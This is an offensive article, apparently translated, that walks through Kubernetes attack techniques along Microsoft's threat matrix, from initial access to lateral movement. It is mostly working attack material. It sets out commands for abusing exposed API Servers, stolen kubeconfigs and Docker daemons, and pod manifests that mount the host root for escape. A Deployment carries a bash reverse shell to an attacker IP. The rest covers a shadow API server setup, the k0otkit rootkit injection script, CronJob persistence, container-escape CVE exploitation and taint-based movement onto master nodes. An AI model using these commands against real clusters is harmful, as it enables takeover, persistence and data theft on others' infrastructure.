Cloud-native Kubernetes security


With more and more enterprises moving to the cloud, attack and defense exercises increasingly involve cloud-related scenarios such as public cloud, private cloud, hybrid cloud, and virtualized clusters. The traditional penetration path was 'external network breach -> privilege escalation -> persistence -> information gathering -> lateral movement -> repeated information gathering' until the important target system was obtained. With the introduction of cloud services and virtualization technology, however, this has changed, and new intrusion paths have opened up, such as:

Attack the cloud management platform through virtual machines and use the management platform to control all machines


Escape through containers to control the host machine and laterally penetrate to the K8s Master node to control all containers

Use a KVM/QEMU escape to obtain the host machine, enter the physical network for lateral movement, and take control of the cloud platform

Many scattered attack techniques for cloud-native scenarios can be found on the Internet, and only a few vendors have published related threat matrices, without much detail. This article expands on the Kubernetes threat matrix released by Microsoft and describes the specific attack techniques.

The items marked in red are the technical points that attackers care about most.

Initial access

Unauthorized access to API Server

Unauthorized access to kubelet

Public exposure of Docker Daemon

Leakage of K8s configfile

Unauthorized access to API Server

The API Server is the management entry point of a K8s cluster and usually listens on ports 8080 and 6443. Port 8080 requires no authentication, while port 6443 requires authentication and is protected by TLS. If developers enable port 8080 and expose it to the public network, attackers can issue commands to the cluster directly through this port's API.

Another scenario is an operations misconfiguration that binds the "system:anonymous" user to the "cluster-admin" ClusterRole, thereby allowing anonymous users to issue commands to the cluster with administrative privileges.
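For reference, this kind of misconfiguration can be introduced with a single command along the lines of the following sketch (the binding name is hypothetical):

# Bind the anonymous user to the cluster-admin ClusterRole (dangerous misconfiguration)
kubectl create clusterrolebinding anonymous-admin --clusterrole=cluster-admin --user=system:anonymous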

# View pods
https://192.168.4.110:6443/api/v1/namespaces/default/pods?limit=500
# Create a privileged container
https://192.168.4.110:6443/api/v1/namespaces/default/pods/test-4444
{"apiVersion":"v1","kind":"Pod","metadata":{"annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"test-4444\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"name\":\"test-4444\",\"volumeMounts\":[{\"mountPath\":\"/host\",\"name\":\"host\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/\",\"type\":\"Directory\"},\"name\":\"host\"}]}}\n"},"name":"test-4444","namespace":"default"},"spec":{"containers":[{"image":"nginx:1.14.2","name":"test-4444","volumeMounts":[{"mountPath":"/host","name":"host"}]}],"volumes":[{"hostPath":{"path":"/","type":"Directory"},"name":"host"}]}}
# Execute command
https://192.168.4.110:6443/api/v1/namespaces/default/pods/test-4444/exec?command=whoami
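A minimal sketch of issuing these requests with curl, assuming the API Server accepts anonymous requests and the JSON body above has been saved as pod.json (the file name is an assumption):

APISERVER=https://192.168.4.110:6443
# List pods
curl -k "$APISERVER/api/v1/namespaces/default/pods?limit=500"
# Create the privileged pod (POST with the JSON body above)
curl -k -X POST -H "Content-Type: application/json" --data @pod.json "$APISERVER/api/v1/namespaces/default/pods"
# The exec endpoint requires an upgraded (SPDY/WebSocket) connection, so kubectl is simpler in practice:
kubectl -s "$APISERVER" --insecure-skip-tls-verify=true exec -it test-4444 -- whoami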

Detailed explanation of creating a privileged container: the pod spec above mounts the host's root directory (hostPath /) at /host inside the container, from which the host filesystem can be read and written.

Leakage of K8s configfile

The K8s configfile (kubeconfig) is the management credential for a K8s cluster and contains detailed information about the cluster (API Server address, login credentials).

If an attacker can obtain this file (for example by compromising an office-network employee machine, or because it was leaked to GitHub), they can take control of the K8s cluster directly through the API Server, which poses a serious risk.

User credentials are stored in the kubeconfig file, and kubectl finds the kubeconfig file in the following order:

If the --kubeconfig parameter is provided, use the provided kubeconfig file.

If the --kubeconfig parameter is not provided but the environment variable $KUBECONFIG is set, use the kubeconfig file provided by the environment variable.

If neither of the above two situations occur, kubectl uses the default kubeconfig file $HOME/.kube/config.

Process to fully utilize the K8s configfile:

K8s configfile --> Create backdoor Pod/Mount host path --> Enter container via Kubectl --> Escape using mounted directory.

#Linux installation of kubectl
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
sudo install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
#Write the stolen content into a config file (or pass it with --kubeconfig); the Server address may need to be changed
kubectl --kubeconfig k8s.yaml get pods
#List the images used in the cluster
kubectl get pods --all-namespaces --insecure-skip-tls-verify=true -o jsonpath="{..image}" |tr -s '[[:space:]]' '\n' |sort |uniq -c
#Create pod.yaml, mounting the host's root directory into the Pod
apiVersion: v1
kind: Pod
metadata:
  name: test-444
spec:
  containers:
  - name: test-444
    image: nginx:1.14.2
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
#Create pod in the default namespace
kubectl apply -f pod.yaml -n default --insecure-skip-tls-verify=true
#Enter the container
kubectl exec -it test-444 bash -n default --insecure-skip-tls-verify=true
#Switch to bash, escape successful
cd /host
chroot . bash

Public exposure of Docker Daemon

Docker operates in a C/S mode, where the docker daemon service runs in the background and is responsible for managing container creation, running, and stopping operations.

On Linux hosts, the docker daemon listens on the unix socket created at /var/run/docker.sock, with port 2375 used for unauthenticated HTTP communication and port 2376 for trusted HTTPS communication.

In early versions, Docker's default configuration opened port 2375 to the outside; current versions only allow local access (via the Unix socket) by default.

The configuration for an administrator to enable remote access is as follows:

#Enable remote access
vim /lib/systemd/system/docker.service
ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375 --containerd=/run/containerd/containerd.sock
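After editing the unit file, the change normally only takes effect once Docker is restarted (assuming a systemd-managed host):

systemctl daemon-reload
systemctl restart docker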

Detection and exploitation of unauthorized access to Docker Daemon:

#Detect unauthorized access
curl http://192.168.238.129:2375/info
docker -H tcp://192.168.238.129:2375 info
# Recommended: export DOCKER_HOST so that subsequent docker commands target the remote daemon
export DOCKER_HOST="tcp://192.168.238.129:2375"

Docker Daemon unauthorized access, practical case:
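A common exploitation path, sketched below under the assumption that the daemon above is reachable and an alpine image can be pulled, is to start a container with the host's root filesystem mounted and chroot into it:

# With DOCKER_HOST set as above, start a container with the host root mounted at /host
docker run -it -v /:/host alpine /bin/sh
# Inside the container, pivot into the host filesystem
chroot /host bash
# From here, write an SSH key or a crontab entry on the host for persistence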

Using Service Account

CURL method request

kubectl method request

Using Service Account

Containers in Pods created by a K8s cluster carry the K8s Service Account's authentication credential by default, located at /run/secrets/kubernetes.io/serviceaccount/token.

If operations personnel have not configured RBAC (Role-Based Access Control) properly, attackers can use the token obtained from a Pod to authenticate to the API Server.

In older versions such as v1.15.11, Kubernetes did not enable RBAC control by default; from version 1.16 the RBAC access-control policy is enabled by default, and from version 1.18 RBAC became a stable feature.
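Before going further, the token's effective permissions can be enumerated; a minimal sketch, assuming kubectl is available inside the Pod:

TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
kubectl --token=$TOKEN --server=https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT} --insecure-skip-tls-verify=true auth can-i --list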

The following is a scenario for accessing the API Server using the Token in a Pod:

# Point to the internal API server hostname
export APISERVER=https://${KUBERNETES_SERVICE_HOST}
# Set the path of the ServiceAccount token
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
# Read the namespace of pods and set it as a variable.
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
# Read the ServiceAccount token
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
# CACERT Path
export CACERT=${SERVICEACCOUNT}/ca.crt
# View all Namespaces in the current cluster
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces
# Write yaml, create privileged pod
cat > nginx-pod.yaml << EOF
apiVersion: v1
kind: Pod
metadata:
  name: test-444
spec:
  containers:
  - name: test-444
    image: nginx:1.14.2
    volumeMounts:
    - name: host
      mountPath: /host
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
EOF
# Create pod
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -k ${APISERVER}/api/v1/namespaces/default/pods -X POST --header 'content-type: application/yaml' --data-binary @nginx-pod.yaml
# View information
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/default/pods/test-444
# Execute command
curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET "${APISERVER}/api/v1/namespaces/default/pods/test-444/exec?command=ls&command=-l"
or
api/v1/namespaces/default/pods/nginx-deployment-66b6c48dd5-4djlm/exec?command=ls&command=-l&container=nginx&stdin=true&stdout=true&tty=true
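The same steps can also be performed with kubectl instead of curl (the "kubectl method request" mentioned above); a brief sketch reusing the variables defined earlier and assuming kubectl is available in the Pod:

kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true apply -f nginx-pod.yaml -n default
kubectl --token=$TOKEN --server=$APISERVER --insecure-skip-tls-verify=true exec -it test-444 -n default -- ls -l /host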

Persistence

DaemonSets, Deployments

Shadow API

Rootkit

cronjob persistence

Deployment

When containers are created through DaemonSets or Deployments, they are automatically re-created even after being cleaned up, and attackers often exploit this feature for persistence. The concepts involved include:

ReplicationController (RC)

A ReplicationController ensures that a specified number of Pod replicas is running at all times.

ReplicaSet (RS)

ReplicaSet, abbreviated as RS, is officially recommended as the replacement for RC. RS and RC have essentially the same functionality; the main current difference is that RC only supports equality-based selectors, while RS also supports set-based selectors.

Deployment

Its main responsibility, like that of RC, is to ensure the number and health of Pods; most of its functionality is identical, so it can be regarded as an upgraded version of the RC controller.

Official components such as kube-dns (CoreDNS) are also managed with Deployments, while kube-proxy runs as a DaemonSet.

Here, a Deployment is used to deploy the backdoor:

# dep.yaml
apiVersion: apps/v1
kind: Deployment # Ensure that a specific number of Pod replicas are running at all times
metadata:
  name: nginx-deploy
  labels:
    k8s-app: nginx-demo
spec:
  replicas: 3 # Specify the number of Pod replicas
  selector:
    matchLabels:
      app: nginx
  template:
    metadata:
      labels:
        app: nginx
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: nginx
        image: nginx:1.7.9
        imagePullPolicy: IfNotPresent
        command: ["bash"] # Reverse Shell
        args: ["-c", "bash -i >& /dev/tcp/192.168.238.130/4242 0>&1"]
        securityContext:
          privileged: true # Privileged mode
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
          type: Directory
# Create
kubectl create -f dep.yaml
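To receive the reverse shells, a listener must already be running on the attacker host named in the manifest (192.168.238.130); a short usage sketch:

# On the attacker machine
nc -lvnp 4242
# On the cluster, confirm the backdoor replicas are up
kubectl get deployment nginx-deploy
kubectl get pods -l app=nginx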

Shadow API Server

If a shadow API Server has been deployed, it has the same functionality as the cluster's existing API Server; it also grants full k8s privileges, accepts anonymous requests, and saves no audit logs, which makes traceless management of the entire cluster and subsequent penetration much easier for the attacker.

Configuration and exploitation of Shadow API Server:

Configuration file path:
/etc/systemd/system/kube-apiserver-test.service
#One-click deployment Shadow apiserver
./cdk run k8s-shadow-apiserver default
#One-click deployment will add the following options to the configuration file:
--allow-privileged
--insecure-port=9443
--insecure-bind-address=0.0.0.0
--secure-port=9444
--anonymous-auth=true
--authorization-mode=AlwaysAllow
#Access and exploit with kcurl
./cdk kcurl anonymous get https://192.168.1.44:9443/api/v1/secrets

Rootkit

Here a k8s rootkit is introduced: k0otkit, a general post-exploitation technique for penetration testing of Kubernetes clusters. With k0otkit, all nodes in the target Kubernetes cluster can be manipulated quickly, stealthily, and persistently (reverse shell).

Technologies used by K0otkit:

DaemonSet and Secret resources (fast, persistent reverse shells; resource isolation)

kube-proxy image (living off the land)

Dynamic container injection (high stealth)

Meterpreter (traffic encryption)

Fileless attack (high stealth)

#Generate k0otkit
./pre_exp.sh
#Listen
./handle_multi_reverse_shell.sh

Copy the content of k0otkit.sh to the master for execution:

volume_name=cache
mount_path=/var/kube-proxy-cache
ctr_name=kube-proxy-cache
binary_file=/usr/local/bin/kube-proxy-cache
payload_name=cache
secret_name=proxy-cache
secret_data_name=content

ctr_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ containers:/{print NR}')
volume_line_num=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | awk '/ volumes:/{print NR}')
image=$(kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml | grep " image:" | awk '{print $2}')
# create payload secret
cat << EOF | kubectl --kubeconfig /root/.kube/config apply -f -
apiVersion: v1
kind: Secret
metadata:
  name: $secret_name
  namespace: kube-system
type: Opaque
data:
  $secret_data_name: N2Y0NTRjNDYwMTAxMDEwMDAwMDAwMDAwMDAwMDAwMDAwMjAwMDMwMDAxMDAwMDAwNTQ4MDA0MDgzNDAwMDAwMDAwMDAwMDAwMDAwMDAwMDA......
EOF

# inject malicious container into kube-proxy pod
kubectl --kubeconfig /root/.kube/config -n kube-system get daemonsets kube-proxy -o yaml \
  | sed "$volume_line_num a\ \ \ \ \ \ - name: $volume_name\n        hostPath:\n          path: /\n          type: Directory\n" \
  | sed "$ctr_line_num a\ \ \ \ \ \ - name: $ctr_name\n        image: $image\n        imagePullPolicy: IfNotPresent\n        command: [\"sh\"]\n        args: [\"-c\", \"echo \$$payload_name | perl -e 'my \$n=qq(); my \$fd=syscall(319, \$n, 1); open(\$FH, qq(>&=).\$fd); select((select(\$FH), \$|=1)[0]); print \$FH pack q/H*/, <STDIN>; my \$pid = fork(); if (0 != \$pid) { wait }; if (0 == \$pid){system(qq(/proc/\$\$\$\$/fd/\$fd))}'\"]\n        env:\n          - name: $payload_name\n            valueFrom:\n              secretKeyRef:\n                name: $secret_name\n                key: $secret_data_name\n        securityContext:\n          privileged: true\n        volumeMounts:\n        - mountPath: $mount_path\n          name: $volume_name\"
  | kubectl --kubeconfig /root/.kube/config replace -f -

cronjob persistence

CronJob is used to execute periodic actions, such as backups, report generation, etc., and attackers can use this feature for persistence.

apiVersion: batch/v1
kind: CronJob		#Use CronJob object
metadata:
  name: hello
spec:
  schedule: "*/1 * * * *"	#Execute once a minute
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: hello
            image: busybox
            imagePullPolicy: IfNotPresent
            command:
            - /bin/sh
            - -c
            - #Reverse Shell or Trojan	
          restartPolicy: OnFailure
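A hedged example of filling in the elided command and applying the CronJob (the attacker address reuses the one from the Deployment example; the file name is an assumption). Note that the busybox image ships sh rather than bash, so a busybox-compatible payload is more reliable, depending on how busybox was built:

# Example payload for the command field above:
#   nc 192.168.238.130 4242 -e /bin/sh
kubectl apply -f cronjob.yaml
kubectl get cronjob hello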

Privilege Escalation

Privileged Container Escape

Docker Vulnerability

Linux Capabilities Escape

Privileged Container Escape

When the container starts with the --privileged option, the container can access all devices on the host machine.
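On a plain Docker host the same situation is created by starting the container with the flag directly, for example:

docker run -it --privileged ubuntu:latest bash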

In K8s, the equivalent is enabling privileged: true in the Pod spec's securityContext:

spec:
  containers:
  - name: ubuntu
    image: ubuntu:latest
    securityContext:
      privileged: true

Practical Case:

After obtaining a WebShell through a vulnerability, check whether .dockerenv exists in the root directory (to confirm you are inside a container), use fdisk -l to list the host's disks, and then escape by mounting the host disk:

#Operations in the WebShell
fdisk -l
mkdir /tmp/test
mount /dev/sda3 /tmp/test
chroot /tmp/test bash

Docker Vulnerability

Here, two well-known Docker escape vulnerabilities are introduced.

CVE-2020-15257

In containerd versions before 1.3.9 and in 1.4.0~1.4.2, if a container runs in host network mode, the containerd-shim API (an abstract Unix socket) is exposed to the container, and escape can be achieved by calling this API.

Characteristics of Host mode:

Share the host machine's network

No loss of network performance

There is no isolation between container networks

Network resources cannot be separately counted

Port management is difficult

Port mapping is not supported

#Determine if host mode is used
cat /proc/net/unix | grep 'containerd-shim'

#Get a reverse shell from the host machine to the attacker's server
./cdk_linux_386 run shim-pwn reverse 192.168.238.159 4455

CVE-2019-5736

When runc is dynamically compiled, it loads dynamic link libraries from within the container image, which allows a malicious library to be loaded; when /proc/self/exe (i.e., runc) is opened, the malicious code in the library runs. Because the malicious program inherits the file handle that runc has open on itself, it can overwrite the runc binary on the host through that handle.

After that, when executing commands related to runc again, an escape will occur.

Version vulnerability:

docker version <=18.09.2

RunC version <=1.0-rc6

Exploitation process:

#Download POC
https://github.com/Frichetten/CVE-2019-5736-PoC
#Compile
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

A successful exploitation with the default payload copies the host's /etc/shadow file to the /tmp/ directory.

#Copy the compiled main into the docker container; in practice it would be uploaded through a WebShell
docker cp main name:/home
cd /home/
chmod 777 main
./main
#The exploit triggers the next time an administrator enters the container (e.g. with docker exec):

Or change line 16 to reverse shell to obtain host privileges.

Capabilities

Capabilities are a security mechanism in Linux, introduced after Linux kernel 2.2, mainly used for more granular control of permissions. The container community has been working hard to implement the concepts and principles of defense in depth and minimum privilege.

Docker has since replaced the capability blacklist mechanism with a default-deny model: all capabilities are dropped by default, and only the minimum set required for container operation is granted back as a whitelist.

#View Capabilities
cat /proc/self/status | grep CapEff
capsh --print
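The CapEff bitmask can be decoded into capability names with capsh (from libcap, assuming it is installed); a small sketch:

# Read the effective capability mask of the current process
CAP=$(grep CapEff /proc/self/status | awk '{print $2}')
# Decode it into human-readable capability names
capsh --decode=$CAP
# A fully privileged container typically decodes to the complete capability set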

Some capabilities permit system-management tasks such as mounting and unmounting file systems or setting disk quotas; containers granted the following capabilities are candidates for escape:

cap_sys_ptrace-container

cap_sys_admin-container

cap_dac_read_search-container

These scenarios are not common in practice; the escape methods are similar to the mount-based escapes described above.

Detection

Internal network scanning

K8s common port scanning

Cluster internal network

Cluster internal network scanning

There are four main types of communication in a Kubernetes network:

Communication between containers within the same Pod

Communication between Pods

Communication between Pods and Service

Communication between external traffic to the cluster and Service

So this is no different from ordinary internal network penetration: nmap, masscan, and other scanners all apply.

K8s common port scanning
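The ports below are the commonly used defaults for K8s components; a hedged scanning sketch (the target range is a placeholder):

# 6443/8080: API Server; 10250/10255: kubelet; 2379/2380: etcd;
# 2375/2376: Docker daemon; 10256: kube-proxy; 30000-32767: NodePort services
nmap -p 6443,8080,10250,10255,10256,2375,2376,2379,2380,30000-32767 192.168.238.0/24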

Cluster internal network

The Flannel network plugin uses the 10.244.0.0/16 network by default

Calico uses the 192.168.0.0/16 network by default
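Given those default CIDRs, a quick sweep of the Pod network might look like the following (slow on a full /16, so narrowing the range is usually preferable):

# Flannel default Pod network
nmap -sn 10.244.0.0/16
# Calico default Pod network
nmap -sn 192.168.0.0/16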

Lateral Movement

Taint-based Lateral Penetration

Taint-based Lateral Penetration

Taints are an advanced K8s scheduling feature used to restrict which Pods can be scheduled onto a node. The master node usually carries a taint that prevents ordinary Pods from being scheduled onto it unless they tolerate that taint; normally only system-level Pods, such as those in kube-system, tolerate it.

A pod can only be scheduled to a node if it tolerates the node's taints

By setting a matching toleration when creating a Pod, an attacker can get the Pod scheduled onto (and thus injected into) the master nodes of the cluster.

#View node information
[root@node1 ~]# kubectl get nodes
NAME              STATUS                     ROLES    AGE   VERSION
192.168.238.129   Ready,SchedulingDisabled   master   30d   v1.21.0
192.168.238.130   Ready,SchedulingDisabled   master   30d   v1.21.0
192.168.238.131   Ready                      node     30d   v1.21.0
192.168.238.132   Ready                      node     30d   v1.21.0
#Check the taints on the Master node
[root@node1 ~]# kubectl describe nodes 192.168.238.130
Name:               192.168.238.130
Roles:              master
Labels:             beta.kubernetes.io/arch=amd64
                    beta.kubernetes.io/os=linux
                    kubernetes.io/arch=amd64
                    kubernetes.io/hostname=192.168.238.130
                    kubernetes.io/os=linux
                    kubernetes.io/role=master
Annotations:        flannel.alpha.coreos.com/backend-data: {"VtepMAC":"66:3b:20:6a:eb:ff"}
                    flannel.alpha.coreos.com/backend-type: vxlan
                    flannel.alpha.coreos.com/kube-subnet-manager: true
                    flannel.alpha.coreos.com/public-ip: 192.168.238.130
                    node.alpha.kubernetes.io/ttl: 0
                    volumes.kubernetes.io/controller-managed-attach-detach: true
CreationTimestamp:  Tue, 14 Sep 2021 17:41:30 +0800
Taints:             node.kubernetes.io/unschedulable:NoSchedule
#Create a Pod with toleration parameters
kubectl create -f control-master.yaml
#control-master.yaml content:
apiVersion: v1
kind: Pod
metadata:
  name: control-master-15
spec:
  tolerations:
    - key: node.kubernetes.io/unschedulable
      operator: Exists
      effect: NoSchedule
  containers:
    - name: control-master-15
      image: ubuntu:18.04
      command: ["/bin/sleep", "3650d"]
      volumeMounts:
      - name: master
        mountPath: /master
  volumes:
  - name: master
    hostPath:
      path: /
      type: Directory
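Once the Pod is scheduled onto the master node, the host filesystem mounted at /master can be used to escape, following the same pattern as earlier:

kubectl exec -it control-master-15 -- /bin/bash
# Inside the container, pivot into the master node's root filesystem
cd /master
chroot . bash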

Conclusion

Currently, black-hat groups mainly mine cryptocurrency by bulk-scanning for and then exploiting unauthorized access.

Offensive and defensive techniques in this area are still at an early stage, but as cloud-native attack tooling matures, the barrier to entry for such attacks will drop accordingly.

New attack methods such as virtual machine/container escapes and supply chain attacks will grow rapidly; they are difficult to carry out but can cause significant harm and impact.

In private cloud deployments inside the enterprise production network, the cloud's underlying network, physical devices, and business network often sit in the same security domain and lack effective isolation.

Private cloud products are usually custom-developed and rely on a large number of third-party components, whose vulnerabilities will be exposed over time as security researchers study them.

Reference links:

TeamTNT Targets Kubernetes, Nearly 50,000 IPs Compromised in Worm-like Attack

https://www.trendmicro.com/en_us/research/21/e/teamtnt-targets-kubernetes--nearly-50-000-ips-compromised.html

Threat matrix for Kubernetes

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

Kubernetes Attack Surface

https://www.optiv.com/insights/source-zero/blog/kubernetes-attack-surface

Attack methods and defenses on Kubernetes

https://dione.lib.unipi.gr/xmlui/handle/unipi/12888

k0otkit

https://github.com/Metarget/k0otkit

CVE-2019-5736-PoC

https://github.com/Frichetten/CVE-2019-5736-PoC

Announcement of Docker operating system command injection vulnerability (CVE-2019-5736)

https://support.huaweicloud.com/bulletin-cce/cce_bulletin_0015.html
